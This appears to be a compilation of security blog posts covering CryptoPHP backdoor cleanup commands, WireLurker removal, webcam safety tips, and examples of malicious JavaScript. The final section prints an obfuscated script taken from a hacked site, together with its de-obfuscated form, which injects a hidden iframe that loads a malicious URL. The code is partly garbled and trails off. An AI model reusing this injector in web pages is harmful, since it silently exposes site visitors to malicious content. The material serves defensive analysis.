How to Clear/Remove CryptoPHP PHP Deadly Malware

---

What is CryptoPHP

---

CryptoPHP is a dangerous threat named by the Fox-IT’s security research team who detected it for the first time in the year of 2013. (Read recent news about cryptophp). According to them the threat uses the backdoor themes and plug-ins which uses in the CMS (content management system) to attack the web servers. This is so because today many of the web administrators are using CMS rather than the raw HTML for building their websites. The popular CMS like Word press, Joomla and Drupal are under the attack as they are using the pirated themes and plug-ins on their websites. Once if you have installed these backdoor malicious themes and plug-ins on your website, the malware can be controlled by the attackers by manually or via command and control (CC) and email communications. From there on-wards they will use your website for illegal search optimization, which is known as Blackhat SEO.

Recommend Post:-How To Detect And Remove WireLurker Malware From iPhone, iPad

CryptoPHP carries several hardcoded domains for command-and-control communications and uses RSA encryption to protect its communications with the C2 servers. Some versions also have a backup ability to communicate over email if the C2 domains are taken down. The PHPCrypto malware can update itself, inject content into the compromised sites it sits on and perform several other functions. Fox IT has a very in-depth whitepaper available Operators of CryptoPHP currently abuse the backdoor for illegal search engine optimization, also known as Blackhat SEO. The backdoor is a well developed piece of code and dynamic in its use. The capabilities of the CryptoPHP backdoor include:
*. Integration into popular content management systems like WordPress, Drupal and Joomla.
*. Public key encryption for communication between the compromised server and the command and control (C2) server.
*. An extensive infrastructure in terms of C2 domains and IP’s.
*. Backup mechanisms in place against C2 domain takedowns in the form of email communication.
*. Manual control of the backdoor besides the C2 communication.
*. Remote updating of the list of C2 servers.
*. Ability to update itself.
From Last few days Abuseat/CBL have suddenly built this into their database. Now they are blocking server IP which contains CryptoPHP PHP malware.

---

How to Detect and Clean CryptoPHP PHP Malware

---

It seems attacker is injecting malware using social.png file. Here is a simple command that can really find all such files and print first 80 characters from this file just to confirm it’s content.

find/home/ -name "social*.png" -exec grep -E -o 'php.{0,80}' {} \; -print

You need to delete those files and examine such user account, Because just deleting this file will not actually solve anything. Also you can run following command.

find -L /home -type f -name '*.png' -print0 | xargs -0 file | grep "PHP script" > /root/crypto.txt

This will check all png files, you can expand it to check all jpg and gif files as well. The output will contain a list of files that are actually php scripts. Also I’d suggest to run maldet or clamav scan on your server to find out the CryptoPHP PHP malware. Make sure to update both clamav and maldet prior to scanning.
freshclam
maldet -u
Also submit IP removal request on CBL.
Important Tips:
*. Do not install web templates/themes from unknown website.
*. Before file installation, scan the whole document on well known website scanners like VirusTotal, Metascan Online and so on.
*. If you are a web developer, expand the whole file and look for unknown coding/characters. If unknown codes found, remove them in order to hit the code maker.

Love this article?

Share it with your friends on Facebook

How To Detect And Remove WireLurker Malware From iPhone, iPad

---

What is WireLurker?

---

The WireLurker malware, known to infect OS X powered Macs and iOS devices has stirred up the Apple community. Malware that successfully infects Apple products is rare. On the Mac that was because criminals tended to go after the much bigger Windows market, while on the iPhone and iPad, Apple's App Store security has been exemplary. Known to exist as a threat in China

---

How do I detect WireLurker?

---

The WireLurker malware installs a number of files on your OS X system, which set it up to detect any iOS systems you attach by a USB cable, and then install malware into that iOS device. If you have any of these files on your Mac, then you likely have the malware installed. These have been outlined by Palo Alto Networks, the company that discovered the malware, and for the current variant of the malware include the following files:
1. A file called run.sh in the Macintosh HD > Users > Shared folder
2. Any of the following files in the Mac into sh HD > Library > Launch Daemons folder

com.apple.machook_damon.plist

com.apple.globalupdate.plist

3. Any of the following files in the Macintosh HD > System > Library > Launch Daemons folder

com.apple.appstore.plughelper.plist

com.apple.MailServiceAgentHelper.plist

com.apple.systemkeychain-helper.plist

4. In addition, the following files and folders will be in the hidden usr/bin directory, which can be opened by pressing Shift-Command-G in the Finder and then then entering “/usr/bin” in the path field that shows up:

globalupdate/usr/local/machook/WatchProcitunesupdate
com.apple.MailServiceAgentHelper

If you see any or all of these files in your Mac’s hard drive, then your Mac has likely been compromised.

---

How to protect against WireLurker?

---

The first step Mac users can take to protect themselves is to not download or run any applications that come from third-party app stores. Go to OS X's System Preferences, click "Security and Privacy," and then select "Allow apps downloaded from Mac App Store (or Mac App Store and identified developers)." This will prevent the Mac from installing any software unauthorized by Apple. Next, install a decent OS X antivirus application. Some of the best ones are free, so you have nothing to lose. Be sure to keep all the software on all your iOS and OS X devices up-to-date. Apple is quite responsive about patching vulnerabilities. Never connect your iPhone to an unknown or untrusted computer, whether it's a Mac or a PC, or even an untrusted charger, chargers can actually be mini-computers.

---

How do I remove WireLurker?

---

Fortunately, WireLurker appears to be easy to remove. All you have to do is delete the related files from the affected Macs or iOS devices.
For Jailbroken Users
Step 1: Install a File manager such as iFile or Filza. You could also use SSH capabilities to gain access to your iDevice from your Mac or PC.
Step 2: Navigate to > Library > MobileSubstrate > DynamicLibraries.
Step 3: Here, look for a file named sfbase.dylib and if found, you know your device is infected. However, if no such file exists, breathe a sigh of relief. Normally one would perceive deleting this file as a removal of the threat that WireLurker is, but it is recommended that you do a complete restore of your iOS device from iTunes.
For Non-Jailbroken Users
Although there’s no way you can be infected by WireLurker at this point, considering Apple has placed in appropriate security measures, but, there’s a possibility that you conceived the malware a while back before the Cupertino giant took action. And if you believe that you’re infected, and don’t happen to be jailbroken, then read on.
Step 1: Open the Settings app and go to General > Profile.
Step 2: Check for any anomalous profile and if you find one delete it.
Step 3: Check all installed apps for strange behavior, and delete all strange or suspicious ones that you find installed. Again, it is highly recommended that you do a complete restore of your iOS device from iTunes till a more effective and sure fire solution comes up.

Webcam Safety Tips: Are You Being Watched Through Your Webcam?

---

Webcam Safety Tips

---

A few clicks of the mouse, and your webcam is activated and ready to be used. But have you considered the possibility that someone else could be watching you through your own webcam?

Read Also:- How to use your phone as a wireless keyboard and mouse for your PC

Well, strictly speaking, if your computer is secure and uninfected, can’t be accessed remotely, and has strong password, locked case, tied up with string to prevent people from accessing it when unattended, then no worries, you’re good.

---

How Webcams Get Hacked

---

Hackers utilize a type of software called Remote access tool (RAT) that allows them to remotely access a computer as if they were physically there. Though RATs were designed for legal purposes, like allowing a technician to remotely access a user’s computer to troubleshoot problems without having to physically be there, hackers exploit this software for their own benefit.
Typically, a hacker lures an unsuspecting user into clicking on a link, opening a picture or email attachment, visiting a specific website, or downloading some software. After the user falls for one of these, the RAT software is secretly installed onto the user’s computer. The hacker now has remote access to the user’s computer.

---

Preventing Your Webcam from Being Hacked

---

Many articles recommend covering the lens of the webcam with a piece of paper to prevent hackers from spying on you. But doing that alone is brushing the real problem under a rug. Having your webcam hacked means your PC has been compromised by some malware, and you need to take immediate action to get rid of it. Here are some easy things you can do that can prevent your computer from being compromised in the first place.

---

Don’t Click on Unknown Links

---

Hackers lure victims into installing RAT software onto their PC by disguising links, pictures, or email attachments as something desirable, such as free music, movies, or desktop wallpapers. Be wary of suspicious websites that offer similar items. Also be cautious about clicking on shortened links you may find on social media sites.

---

Equip your computer with an antivirus and two-way firewall

---

Having an antivirus and two-way firewallis minimum security any PC should be equipped with. An up-to-date and active antivirus helps to detect and remove malware from infecting your computer. A two-way firewall monitors inbound and outbound traffic to-and-from your computer.

---

Be cautious of tech support offering remote assistance

---

Hackers may physically contact you by claiming there are problems with your computer. They’ll try to persuade you to install a program that allows them remote access to your computer, so that they can fix the problem. Simply ignore calls from those who claim they are tech support.

---

Secure your wireless connection

---

A hacker can easily hack into unsecure Wi-Fi networks with a laptop, antenna, and widely available software. Don’t make it easy for them. Secure your wireless connection with a strong and complex password.

---

Disable Windows Remote Access

---

Though most RATs deployed by malware are custom tools, disabling Windows Remote Assistance and Remote Desktop is one thing you can do to prevent hackers from remotely accessing your computer.

Love this article?

Share it with your friends on Facebook

Examples of Malicious JavaScript

If the hackers are using script to hack your site it will be obfuscated to try and hide what the script is doing. This type of hack can be inserted in individual html/php pages on a site or into one of the javascript files. The bottom line is, if you see blocks of obfuscated script in one of your files be suspicious, check to make sure you know exactly what the script is doing. In the vast majority of hacks the obfuscated script is going to write either an iframe or a script call into the pages of the site. The [src="http://some.malicious.site/malicious.php"] will be a URL that loads the malicious content into the page.
Now a few examples of code I have seen on hacked sites.

<sc​riptg&t;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.from​CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|do​cument|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|get​ElementById|function|createElement|iframe|append​Child|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{})) </sc​ript>

Which de-obfuscates to ->

function MakeFrameEx(){ element = do​cument.get​ ElementById('yahoo_api'); if (!element){ var el = do​cument.cr​ eateElement('if​rame'); do​cument.body.append​Child(el); el.id = 'yahoo_api'; el.style.width = '1px'; el.style.height = '1px'; el.style.display = 'none'; el.src = 'hxxp://​juyfdjhdjdgh​.nl ​.ai​/showthread.php?t=72241732' } } var ua = navigator.userAgent.toLowerCase(); if (((ua.indexOf("msie") !=- 1 && ua.indexOf("opera") ==- 1 && ua.indexOf("webtv") ==- 1)) && ua.indexOf("windows") !=- 1){ var t = setTimeout("MakeFrameEx()", 1000) } <sc​ript>date=new Date();var ar="Jp}g3ra]A\"kmTdQh{,'=Dyi)cf>1(0o[F

Always follow up with some basic security checks. Figuring out how the rats are getting into the barn is always tough. Most hosting services will help by checking access logs, looking at file ownership etc. so ask your hosting service for any information they can provide.